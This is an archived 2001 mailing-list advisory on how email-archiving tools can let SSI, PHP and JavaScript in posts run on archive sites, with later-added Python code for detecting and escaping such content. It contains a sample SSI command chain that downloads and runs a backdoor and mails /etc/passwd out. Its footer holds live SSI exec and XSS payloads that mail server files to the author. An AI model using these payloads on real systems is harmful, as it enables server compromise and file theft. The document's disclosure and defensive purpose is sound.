Vulnerability Development mailing list archives

The Dangers of Email Archives


From: bugtraq <bugtraq () cgisecurity net>
Date: Thu, 25 Oct 2001 09:10:20 +0000 (GMT)

 
 Hello,
 
 Below is something I wrote in regards to the threats that email archiving software/tools can bring.
 
 
 # MHonArc
 # Email to HTML converter. While not vulnerable itself, it is what
 # most people use to convert/display information for archived
 # lists. (VULNERABLE/TESTED)
 
 # Could be exploited via javascript insertion from an img tag
 # and possibly others. (See Georgi Guninski's examples)
 http://www.oac.uci.edu/indiv/ehood/mhonarc.html
 
 While this product itself doesn't have a hole in it, it is often used to help
 translate mail for other archiving software. I've seen examples where
 email was translated with this tool and archived with other software, and HTML
 tags were translated/executed as normal.
 
 
 
 
 
 I haven't had the time to test a lot of other products.
 Comments, Ideas, blah?
 
 
 
 
 
 
 
 
                                    Author: Zenomorph
                                  admin () cgisecurity com
           Email Archives may allow Distributed Attacks against users and Web servers
 
 
 I Introduction
 
 Mailing lists are often archived for later viewing on websites. The software
 that archives these email messages may allow an attacker to execute commands,
 insert false information, cause a wide-scale browser DoS, and more.
 
 Millions of sites archive these mailing lists, and each site archiving a malicious post
 could either be attacked or help launch an attack.
 
 
 II Examples:
 
 Server Side Includes
 
 If an attacker sends an email containing a Server Side Include (SSI) tag, it may be possible
 to carry out the attack types listed below.
 
 * (Client side) Including of large files, which may lead to a small Denial of Service of clients.
   (Bandwidth consumption, memory consumption, etc.)
 
 * (Client/Server side) Including of local files such as /dev/urandom, which will not only
   slow down the server and eat up bandwidth, but possibly DoS the client viewing the page.
 
 * (Server side) Command execution. The server may execute the SSI request if server-side
   includes are enabled. This could lead to web server compromise: with the right
   series of commands an attacker could download and install a backdoor with web server privileges.
 
 
 Below is an example to give you an idea.
 
 id;wget http://host/backdoor.c;cc backdoor.c;./a.out <port to listen on>;mail attacker@host </etc/passwd;
 (Just a random example)
 
 Then the attacker would just need to telnet to the port specified in
 the trojan and would be greeted by a shell with the user rights of the
 web server. With a local account an attacker could then locally exploit your
 machine to gain administrative privileges.
 
  
 Possible forging of other users' posts:
 
 (A more advanced method, which would depend on the particular mail archiving script.
 One would have to learn the output of a post along with its formatting,
 and then it may be possible to forge a reply from another user.)
 
 
 
 Browser Denial of service:
 
 Some browsers have holes which can lead to either a browser or system crash. This would
 occur when an email had been sent with the proper HTML/JavaScript tags. The email would
 be archived. With some archiving software the HTML isn't stripped, and it is included
 on the website page you're viewing.
 
 
 
 Malicious JavaScript/Java applets:
 
 May be possible depending on browser security settings.
 
 
 
 PHP Insertion:
 
 May allow command execution or file includes depending on archiving software.
 
 
 
 Other Markup Languages:
 
 Any other markup language which may allow file includes or command execution.
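 As an added example, not code from the original post, the following Python is a small
 pre-archive triage scanner for the content classes the Examples section lists: SSI
 directives, PHP tags, script tags, javascript: URLs in src/href attributes and inline
 event handlers. The regular expressions and the sample messages are my own (the samples
 are constructed to mirror the advisory's footer test strings). The idea is to run it over
 a mailbox before MHonArc or a similar tool converts it, so that flagged posts get reviewed
 or forced to plain-text rendering instead of trusting the converter to strip them.

```python
import re

# Constructed sample messages (not from the original post), one per attack type
# named in the advisory plus two benign bodies that must NOT be flagged.
SAMPLE_MESSAGES = {
    "plain": "Hi all, has anyone seen this bug? Thanks.",
    "code_talk": "In C you write: if (a < b && b > c) {...}",
    "ssi_exec": 'Look at this: <!--#exec cmd="ls -al"--> funny',
    "ssi_include": '<!--#include virtual="/dev/urandom" -->',
    "img_js": "<img src=javascript:alert(document.domain)>",
    "script": '<script>window.location="http://example.invalid/"</script>',
    "php": '<?php system("id"); ?>',
}

# Each pattern is a (label, compiled regex). Labels are my own naming.
PATTERNS = [
    # Apache mod_include keys on "<!--#" followed by a directive name.
    ("ssi-directive", re.compile(
        r"<!--\s*#\s*(?:exec|include|echo|config|set|printenv|flastmod|fsize)\b", re.I)),
    # PHP open tags: "<?php", the echo short tag "<?=" or a bare "<? ".
    ("php-tag", re.compile(r"<\?(?:php\b|=|\s)", re.I)),
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    # The img-tag vector from the advisory: a javascript: URL in src/href.
    ("javascript-url", re.compile(r"""(?:src|href)\s*=\s*['"]?\s*javascript:""", re.I)),
    # on*= attributes inside any tag (onclick=, onload=, ...).
    ("event-handler", re.compile(r"<[^>]+\son[a-z]+\s*=", re.I)),
]


def classify(body):
    """Return the sorted list of labels whose pattern matches the message body."""
    return sorted({label for label, pat in PATTERNS if pat.search(body)})


def triage(messages):
    """Map each message name to its findings; an empty list means nothing to review."""
    return {name: classify(body) for name, body in messages.items()}


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_MESSAGES).items():
        print(f"{name:12s} {'OK' if not findings else 'REVIEW: ' + ', '.join(findings)}")
```

 The scanner is a detection aid, not a sanitizer: a post that talks about C code with
 < and > in it is left alone, while the SSI and script samples are reported. Escaping the
 whole body on output, as the Solutions section suggests, is what actually neutralizes
 these; the scanner only tells you which archived posts would have fired.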
 
 
 
 
 
 III Solutions :
 
 * An example of a solution would be to program these archivers to add a slash
   whenever a < or > is present, to help prevent execution of HTML/other.
   (Example: <b>hi</b> becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> )
 
 * Removing the < and > altogether, but if program code or math is involved
   in the post it may remove important information.
 
 * The best solution would be to print out the archives in txt format so no
   code can be executed.
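 As an added example, not part of the advisory, the following Python puts the three
 options above side by side on constructed sample posts: the advisory's backslash
 insertion (as I read its <b>hi</b> to <\b>hi<\/b> example, a backslash after every <),
 removal of the angle brackets, and standard HTML entity encoding via the standard
 library's html.escape. is_inert() checks that a rendered body no longer contains anything
 an HTML parser or Apache's mod_include (which keys on <!--#) would treat as a tag start;
 round_trips() checks whether the original text, code and math included, can still be
 recovered for display. The sample bodies and the function names are my own.

```python
import html
import re

# Constructed sample bodies (not from the original post): the advisory's own
# formatting example, a line of C with comparison operators, and two bodies
# of the kind the advisory warns about.
SAMPLES = {
    "bold": "<b>hi</b>",
    "math": "if (a < b && b > c) return a;",
    "ssi": '<!--#exec cmd="ls -al"-->',
    "img": "<img src=javascript:alert(document.domain)>",
}


def slash_escape(body):
    """The advisory's first option as I read it: a backslash after each '<'."""
    return body.replace("<", "<\\")


def strip_angles(body):
    """The advisory's second option: drop '<' and '>' entirely (lossy)."""
    return body.replace("<", "").replace(">", "")


def entity_escape(body):
    """Standard HTML entity encoding: <, >, &, and quotes become entities,
    which a browser renders back as the original characters."""
    return html.escape(body, quote=True)


# An HTML parser only treats '<' as a tag start when a letter, '!', '/' or '?'
# follows; mod_include looks for '<!--#'. Anything else is plain text.
TAG_START = re.compile(r"<[A-Za-z!/?]")


def is_inert(rendered):
    """True if nothing in the rendered body can open a tag or SSI directive."""
    return TAG_START.search(rendered) is None


def round_trips(body):
    """True if entity encoding can be reversed without loss."""
    return html.unescape(entity_escape(body)) == body


def report():
    """Compare the three options on every sample: is the output inert, and
    does the reader still get the author's original characters back?"""
    out = {}
    for name, body in SAMPLES.items():
        out[name] = {
            "slash_inert": is_inert(slash_escape(body)),
            "strip_inert": is_inert(strip_angles(body)),
            "entity_inert": is_inert(entity_escape(body)),
            "strip_round_trip": strip_angles(body) == body,
            "entity_round_trip": round_trips(body),
        }
    return out


if __name__ == "__main__":
    for name, row in report().items():
        print(name, row)
```

 Entity encoding is the option that is both inert and lossless, which answers the
 information-loss worry in the second bullet: the post's code and math survive, they just
 stop being markup. Independently of how the archiver renders, the web server should never
 be in a position to evaluate a post at all: serve the archive from a directory whose
 Apache Options line omits Includes (or uses IncludesNOEXEC, which blocks #exec and CGI
 includes), and if you take the third bullet's advice and publish plain text, send it with a
 text/plain content type so the browser parses nothing as HTML.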
 
 
 
 
 
 Published to the Public October 2001
 Copyright October 2001 Cgisecurity.com
 
 EOF

 Lame footer
 ******************************************************************
 <!--#exec cmd="ls -al"-->
 If you see a listing of files then this vendor is affected.
 
 <img src=javascript:alert(document.domain)>
 If you see a popup window then this vendor is affected.
 
 <!--#exec cmd="mail bugtraq () cgisecurity com < /etc/motd"-->
Attempt mailing me motd in case you're affected.

<!--#exec cmd="mail bugtraq () cgisecurity com < index.html"-->
 Attempt mailing me your index.html file for shits and giggles
******************************************************************
 
 

